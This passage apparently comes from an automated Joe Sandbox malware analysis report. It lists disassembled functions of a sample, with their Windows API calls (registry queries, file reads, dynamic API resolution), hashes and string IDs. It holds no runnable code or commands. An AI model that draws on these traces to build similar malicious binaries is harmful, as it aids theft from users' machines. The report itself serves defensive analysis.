                                                    • Instruction Fuzzy Hash: 4F316F75A00245BBDB20DFA5DC89FDEB779AF44741F104059FA05E7180DBB0A6418BA5
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
                                                      • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                      • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417E11
                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 702443124-4289949731
                                                    • Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                    • Instruction ID: 79f032b162a4ed5f1b8d8c3a7f5ff0854d2ec62b836a1cb7fb32b648417a52a7
                                                    • Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                    • Instruction Fuzzy Hash: 5921C3323047008BD7249E2CE980B6AB7F5AF95720F604A6FF4968B381D775DC8187A9
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004088B3
                                                      • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                      • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                    • String ID: vector<T> too long$yxxx$yxxx$x@$x@
                                                    • API String ID: 2884196479-4254290729
                                                    • Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                    • Instruction ID: 642d6f8d25606cb57c5c368211f8c71801378994f2d8b98954bdbb6ac3618ebc
                                                    • Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                    • Instruction Fuzzy Hash: 3F31B7B5E005159BCB08DF58C9906AEBBB6EB88310F14827EE905EB385DB34A901CBD5
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 024A2A9C
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2AA3
                                                      • Part of subcall function 024A2B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 024A2B2C
                                                      • Part of subcall function 024A2B17: RtlAllocateHeap.NTDLL(00000000), ref: 024A2B33
                                                      • Part of subcall function 024A2B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024A2AB0), ref: 024A2B52
                                                      • Part of subcall function 024A2B17: RegQueryValueExA.ADVAPI32(024A2AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 024A2B6C
                                                      • Part of subcall function 024A2B17: RegCloseKey.ADVAPI32(024A2AB0), ref: 024A2B76
                                                    • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024997C7), ref: 024A2AD8
                                                    • RegQueryValueExA.ADVAPI32(024997C7,00638C34,00000000,00000000,00000000,000000FF), ref: 024A2AF3
                                                    • RegCloseKey.ADVAPI32(024997C7), ref: 024A2AFD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                    • String ID: Windows 11
                                                    • API String ID: 3225020163-2517555085
                                                    • Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                    • Instruction ID: 98f4230c4523f08708cf37bbcdfd125e926774d78195a173f45c0d03dedf93c3
                                                    • Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                    • Instruction Fuzzy Hash: C1018B71640309AFE714DBA4AC89EAA7B6EEB44315F00115ABE09D3290DAB09D449BE0
                                                    APIs
                                                      • Part of subcall function 02487977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 024879AC
                                                      • Part of subcall function 02487977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 024879F1
                                                      • Part of subcall function 02487977: strlen.MSVCRT ref: 02487A25
                                                      • Part of subcall function 02487977: StrStrA.SHLWAPI(?,0043508C), ref: 02487A5F
                                                      • Part of subcall function 02487977: strcpy_s.MSVCRT ref: 02487A88
                                                      • Part of subcall function 02487977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02487A93
                                                      • Part of subcall function 02487977: HeapFree.KERNEL32(00000000), ref: 02487A9A
                                                      • Part of subcall function 02487977: strlen.MSVCRT ref: 02487AA7
                                                    • lstrcat.KERNEL32(00638E68,0043509C), ref: 02487C37
                                                    • lstrcat.KERNEL32(00638E68,?), ref: 02487C64
                                                    • lstrcat.KERNEL32(00638E68,004350A0), ref: 02487C76
                                                    • lstrcat.KERNEL32(00638E68,?), ref: 02487C97
                                                    • wsprintfA.USER32 ref: 02487CB7
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02487CE0
                                                    • lstrcat.KERNEL32(00638E68,00000000), ref: 02487CEE
                                                    • lstrcat.KERNEL32(00638E68,0043509C), ref: 02487D07
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                    • String ID:
                                                    • API String ID: 2460923012-0
                                                    • Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
                                                    • Instruction ID: d197083da17d7582775b71f1d87140427210425edb2eeb5a987f834b4f3a4dd5
                                                    • Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
                                                    • Instruction Fuzzy Hash: E331B576910614EFDB14EB64DC44AAFFBBABB88714B28151EF60993310DB74E941CBA0
                                                    APIs
                                                    • memset.MSVCRT ref: 0248A136
                                                    • LocalAlloc.KERNEL32(00000040), ref: 0248A16E
                                                      • Part of subcall function 024A7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 024A7495
                                                    • lstrcpy.KERNEL32(00000000,0043520C), ref: 0248A279
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$AllocLocalmemset
                                                    • String ID: @$@"C
                                                    • API String ID: 4098468873-2306624759
                                                    • Opcode ID: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
                                                    • Instruction ID: 0a7d150738467da45cc4265de3e7fdd2f5789fdeac6cbed533625d51dea6929c
                                                    • Opcode Fuzzy Hash: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
                                                    • Instruction Fuzzy Hash: 7D51C271A102A8ABDB10FFB5DC44B9E7BA5AF44318F14446BED08AB241D7B4E941CF90
                                                    APIs
                                                    • memset.MSVCRT ref: 0249DB53
                                                    • RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?,00000000,000000FE), ref: 0249DB73
                                                    • RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,?,?), ref: 0249DB9A
                                                    • RegCloseKey.ADVAPI32(?), ref: 0249DBA5
                                                    • lstrcat.KERNEL32(?,?), ref: 0249DBCB
                                                    • lstrcat.KERNEL32(?,00638968), ref: 0249DBDD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                                    • String ID:
                                                    • API String ID: 2623679115-0
                                                    • Opcode ID: 4a1af6a0b45cfe44b2eee7f251b24306f0ea58b01f04f9454eab07ea38461d91
                                                    • Instruction ID: 903285dffb701295ac8796ddbecab6ff5d6ce46bb5df887ee6e4740862d0d655
                                                    • Opcode Fuzzy Hash: 4a1af6a0b45cfe44b2eee7f251b24306f0ea58b01f04f9454eab07ea38461d91
                                                    • Instruction Fuzzy Hash: 25414A71614288AFD714FF25D841FDE77A6AF84714F00882EB94C87261EB71A949CF92
                                                    APIs
                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004012EE), ref: 00409AFA
                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004012EE), ref: 00409B10
                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,004012EE), ref: 00409B27
                                                    • ReadFile.KERNEL32(00000000,00000000,?,004012EE,00000000,?,?,?,004012EE), ref: 00409B40
                                                    • LocalFree.KERNEL32(?,?,?,?,004012EE), ref: 00409B60
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,004012EE), ref: 00409B67
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                    • String ID:
                                                    • API String ID: 2311089104-0
                                                    • Opcode ID: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
                                                    • Instruction ID: d5e2846254d17b4b79341e9ac440d2f7db04c9e9ad0a28dbd651dd387858d46a
                                                    • Opcode Fuzzy Hash: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
                                                    • Instruction Fuzzy Hash: 06114C71A00209AFE7109FA5ED84ABB737DFB04750F10016AB904A72C1EB78BD408BA8
                                                    APIs
                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,02481555), ref: 02489D61
                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,02481555), ref: 02489D77
                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,02481555), ref: 02489D8E
                                                    • ReadFile.KERNEL32(00000000,00000000,?,02481555,00000000,?,?,?,02481555), ref: 02489DA7
                                                    • LocalFree.KERNEL32(?,?,?,?,02481555), ref: 02489DC7
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,02481555), ref: 02489DCE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                    • String ID:
                                                    • API String ID: 2311089104-0
                                                    • Opcode ID: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
                                                    • Instruction ID: 81f6dc07cbf91bad1d4550d7088a5a28180e7619599e83581317059abf86f564
                                                    • Opcode Fuzzy Hash: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
                                                    • Instruction Fuzzy Hash: 15112E71610615AFEB10EFA8DC84EBF77ADEB04744F10455AF91197380EB70AD40CBA4
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                      • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                      • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004089FD
                                                      • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                      • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                    • memcpy.MSVCRT(?,00000000,?,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408A5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 2202983795-4289949731
                                                    • Opcode ID: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
                                                    • Instruction ID: 649aac53c67e3ee9f5cf0101b70db7c319c758bc323567c03d989288a4630d66
                                                    • Opcode Fuzzy Hash: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
                                                    • Instruction Fuzzy Hash: 0721F6723006108BC720AA5CEA40A6BF7A9DBA1760B20093FF181DB7C1DA79D841C7ED
                                                    APIs
                                                    • memcpy.MSVCRT(?,004074D0,00000040,02487634), ref: 024870A7
                                                    • memcpy.MSVCRT(?,00005A4D,000000F8,00000000), ref: 024870E3
                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 0248711B
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02487122
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heapmemcpy$AllocateProcess
                                                    • String ID: @
                                                    • API String ID: 966719176-2766056989
                                                    • Opcode ID: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
                                                    • Instruction ID: dfd9433c1a11f6a86afe63854a4499e8c52320b2a105fc26801f0233bbfae18b
                                                    • Opcode Fuzzy Hash: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
                                                    • Instruction Fuzzy Hash: 1521A1B46107018BDB259B24CC94BBBB3E8FB40704F98446DE946CBB84E7B8E941CB90
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
                                                    • std::exception::exception.LIBCMT ref: 00408B8B
                                                    • __CxxThrowException@8.LIBCMT ref: 00408BA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ??2@Exception@8Throwstd::exception::exception
                                                    • String ID: Pv@$x@
                                                    • API String ID: 3448701045-2507878009
                                                    • Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                    • Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
                                                    • Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                    • Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(?,00408C9B,00000000,?,?,00000000), ref: 00408D92
                                                    • std::exception::exception.LIBCMT ref: 00408DAD
                                                    • __CxxThrowException@8.LIBCMT ref: 00408DC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ??2@Exception@8Throwstd::exception::exception
                                                    • String ID: Pv@$PC
                                                    • API String ID: 3448701045-1362088297
                                                    • Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                    • Instruction ID: c1c2e9470fcfd07362e0a09b01d9ac21ad58a2ed8b2a4eb6edd2c0a09cf1513b
                                                    • Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                    • Instruction Fuzzy Hash: 9AE02B7050030A97CB18F7B59D016BF73789F10304F40476FE965A22C1EF798504859D
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(?,02488F02,00000000,?,?,00000000), ref: 02488FF9
                                                    • std::exception::exception.LIBCMT ref: 02489014
                                                    • __CxxThrowException@8.LIBCMT ref: 02489029
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ??2@Exception@8Throwstd::exception::exception
                                                    • String ID: PC$PC
                                                    • API String ID: 3448701045-3524912142
                                                    • Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                    • Instruction ID: b4cfd5d90325537ffc803a47755dfcb9950e42d66b7512be19275512029ba51f
                                                    • Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                    • Instruction Fuzzy Hash: B6E02B7080060956CB28FFF58C107BF73789F00314F00071FE82A52380EB7081048A95
                                                    APIs
                                                      • Part of subcall function 02489257: ??2@YAPAXI@Z.MSVCRT(00000020), ref: 02489260
                                                      • Part of subcall function 024A4A67: LoadLibraryA.KERNEL32(0043573C,?,024979A8), ref: 024A4A6D
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435748), ref: 024A4A83
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435750), ref: 024A4A94
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,0043575C), ref: 024A4AA5
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435768), ref: 024A4AB6
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435770), ref: 024A4AC7
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,0043577C), ref: 024A4AD8
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435784), ref: 024A4AE9
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,0043578C), ref: 024A4AFA
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,0043579C), ref: 024A4B0B
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,004357A8), ref: 024A4B1C
                                                    • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024979D7
                                                    • StrCmpCA.SHLWAPI(?,00638C1C), ref: 02497AAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497AE7
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02497B44
                                                      • Part of subcall function 024A74A7: lstrcpy.KERNEL32(00000000), ref: 024A74C1
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816C0
